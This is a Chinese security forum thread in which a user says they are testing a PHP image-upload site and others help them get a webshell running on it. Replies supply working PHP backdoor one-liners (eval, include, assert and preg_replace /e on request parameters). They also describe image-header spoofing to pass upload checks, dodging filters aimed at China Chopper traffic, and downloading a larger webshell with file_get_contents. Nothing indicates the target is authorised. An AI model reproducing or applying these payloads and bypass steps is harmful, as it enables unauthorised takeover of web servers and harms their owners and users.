一个上传的问题:linux+ngnix+php

  • A+
所属分类:网络安全

做测试,linux+ngnix+php,只有一个上传的功能,而且限定一个上传的问题:linux+ngnix+php 
,无法直接上传脚本文件,会提示,图片非法,使用图片马,burp抓包该后缀为.php,可以上传成功,由此可以判定是可以进行图片头欺骗,一句话马可以上传,可以解析,但是菜刀连一句话马的时候会出现500或200的错误,无法进行文件管理,直接做图片大马,小马,均无法解析,还有搞的方法么,跪谢各位大牛了

------------------------------------

1#漂流瓶 | 2014-06-11 19:48

目测没有运行权限··

 

2#phith0n | 2014-06-11 20:00

你先传一个phpinfo,看这东西出得来不。出不来就应该没执行权限,出得来说明是好的。

然后你再传一个eval($_REQUEST[a]);然后手工执行一下命令看看能执行不:xxx.php?a=phpinfo(),如果不能执行,多半是eval之类的函数被杀了或被封了,如果能执行说明是好的

如果能执行,说明是拦截了你的菜刀。这时候你可以传一个include($_REQUEST[a]),然后再把大马改成.gif传上去,包含看看能成功不,到这一步了应该就OK了

 

3#迦南 | 2014-06-11 20:45

@phith0n 学习了,我也遇到这样的问题

 

4#马杀鸡 | 2014-06-11 21:55

@phith0n,先谢谢,我先去试一下

 

5#马杀鸡 | 2014-06-11 23:03

经过测试,evel不能执行,应该是被封掉,phpinfo可以正常执行,一切都进行的十分顺利,但是到最后一步,大马改.gif 无法上传,加gif8a也无法绕过欺骗,事情似乎不受控制了,还请@phith0n再次讲解一下

 

6#马杀鸡 | 2014-06-11 23:03

@phith0n

 

7#Vigoss_Z | 2014-06-11 23:25

@马杀鸡 大马加密。

估计是好多函数禁用了。

想办法突破

 

8#马杀鸡 | 2014-06-11 23:37

@Vigoss_Z

比对phpinfo,好像没有禁用什么函数

disable_classes  no value  no value

disable_functions  no value  no value

display_errors  Off  Off

display_startup_errors  Off  Off

 

9#phith0n | 2014-06-11 23:47

@马杀鸡 

我大概猜到后端是怎么处理的了。调用了诸如getimagesize等函数检查了图片,所以必须用图片马,但图片马你又没法把大马和图片绑定,这会影响大马的功能。

应该不是在disable_functions里禁用的,因为eval根本不算函数,没法在此处禁用,应该是有其他防护功能拦截了。

最好的办法就还是用一句话,你试试这个

<?php 

$replacement = $_REQUEST['wooyun'];

echo preg_replace("/none/e",$replacement , "none");

?>

preg_replace应该是好用的。

或者试一下

assert($_REQUEST[wooyun]);

试的时候别用菜刀,直接手工先试试xxx.php?wooyun=phpinfo(),手工成功了再用菜刀连接看看

 

10#马杀鸡 | 2014-06-12 00:15

@phith0n xxx.php?wooyun=phpinfo()正常显示,一句话还是无法连接,1.jpg

 

11#马杀鸡 | 2014-06-12 00:27

POST经测试,不能使用,貌似只能使用request

 

12#核攻击 | 2014-06-12 09:18

500错误说明已经执行了,只是函数有点问题或者是被什么东西过滤了,你先手工测试,手工测试正常后,再考虑工具。

 

13#Vigoss_Z | 2014-06-12 09:57

@马杀鸡 不是GET,POST的问题,刚才你还传图片了。

POST数据的问题,手工测试,搞清楚是拦截菜刀包,还是对函数执行做过滤了。

 

14#马杀鸡 | 2014-06-12 09:59

@核攻击,谢谢核牛解惑,经过测试,.gif马解析500,.jpg马解析200,根据@phith0n的方法,可以正常解析phpinfo(),初步推测post,eval,均被过滤,可以request 进行包含,但是非gif,jpg文件又不能上传,txt都不能上传,这个图破还请@核攻击,@phith0n两位牛解析一下

 

15#承诺 | 2014-06-12 10:07

围观好帖~!!!

 

16#马杀鸡 | 2014-06-12 14:22

@Vigoss_Z 请问该如何测试,对PHP不是很了解

 

17#E7LE | 2014-06-12 14:35

如果包含呢 可以不可以?

 

18#马杀鸡 | 2014-06-12 16:05

无法上传txt,php文件,只能使用图片马,图片马无法包含

 

19#phith0n | 2014-06-12 18:08

@马杀鸡 

这东西还真不好弄了,如果POST都不接收的话。

有几个方法,定制菜刀,把菜刀改一下,让菜刀的数据包更像手工的。但比较麻烦。

再就是,你手工执行file_get_contents('xxx','xxx'),下载一个大马下来。

 

20#马杀鸡 | 2014-06-12 19:33

@phith0n 我先试一下

 

21#n0tify | 2014-06-12 20:38

留名关注

 

22#马杀鸡 | 2014-06-12 23:59

@phith0n file_get_contents 貌似包含不成功,我使用request来做的解析,是我使用错误吗,能具体介绍一下使用的办法吗


  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: